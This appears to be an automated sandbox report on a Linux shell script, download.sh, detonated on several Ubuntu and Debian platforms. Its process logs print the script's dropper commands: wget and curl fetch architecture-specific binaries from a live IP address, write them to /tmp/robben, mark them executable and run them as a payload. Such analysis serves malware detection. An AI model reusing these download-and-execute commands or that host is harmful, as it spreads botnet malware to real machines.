Analysis Overview
SHA256
19ae1084b4322732191f0325600ae869eb0527f11e5b2c2a7095fe14adaa1902
Threat Level: Shows suspicious behavior
The file download.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-22 21:45
Signatures
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu2004-amd64-20240611-en
Max time kernel
133s
Max time network
183s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x config-err-Tp1zcK download.sh robben snap-private-tmp ssh-STgji971qKoa systemd-private-127e01931ad0492795d0353f431e57ff-colord.service-ZsSGTf systemd-private-127e01931ad0492795d0353f431e57ff-ModemManager.service-00Yxig systemd-private-127e01931ad0492795d0353f431e57ff-switcheroo-control.service-zk9ykg systemd-private-127e01931ad0492795d0353f431e57ff-systemd-logind.service-pgSJ3h systemd-private-127e01931ad0492795d0353f431e57ff-systemd-resolved.service-iov4Mg systemd-private-127e01931ad0492795d0353f431e57ff-upower.service-k2Cpui]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.96:80 | connectivity-check.ubuntu.com | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian12-armhf-20240221-en
Max time kernel
280s
Max time network
325s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-e3db981c57494ebc8542e9cab1066ccf-ntpsec.service-YUWsDn systemd-private-e3db981c57494ebc8542e9cab1066ccf-systemd-logind.service-WnsnYe]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-12 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-12 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-12 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240221-en-12 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian12-mipsel-20240221-en
Max time kernel
300s
Max time network
304s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-8aaf9894ee06476383bd6e60f2d5c264-systemd-logind.service-jplWFO]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-8aaf9894ee06476383bd6e60f2d5c264-systemd-logind.service-jplWFO]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-8 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-8 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-8 | udp |
| US | 1.1.1.1:53 | debian12-mipsel-20240221-en-8 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
debian9-armhf-20240611-en
Max time kernel
248s
Max time network
281s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-08-22 21:45
Reported
2024-08-22 21:51
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
299s
Max time network
300s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-timedated.service-NrPp8B]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-timedated.service-NrPp8B]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x config-err-zQnUeG download.sh netplan_agvzkkfx robben snap-private-tmp ssh-RkhVVFBqnqXf systemd-private-0104f6e541f146c1821cb46a7d879e9a-bolt.service-JTmSDM systemd-private-0104f6e541f146c1821cb46a7d879e9a-colord.service-j4FNmX systemd-private-0104f6e541f146c1821cb46a7d879e9a-ModemManager.service-daBbJ3 systemd-private-0104f6e541f146c1821cb46a7d879e9a-systemd-resolved.service-1lnNMf]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.9:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| GB | 185.125.190.97:80 | connectivity-check.ubuntu.com | tcp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
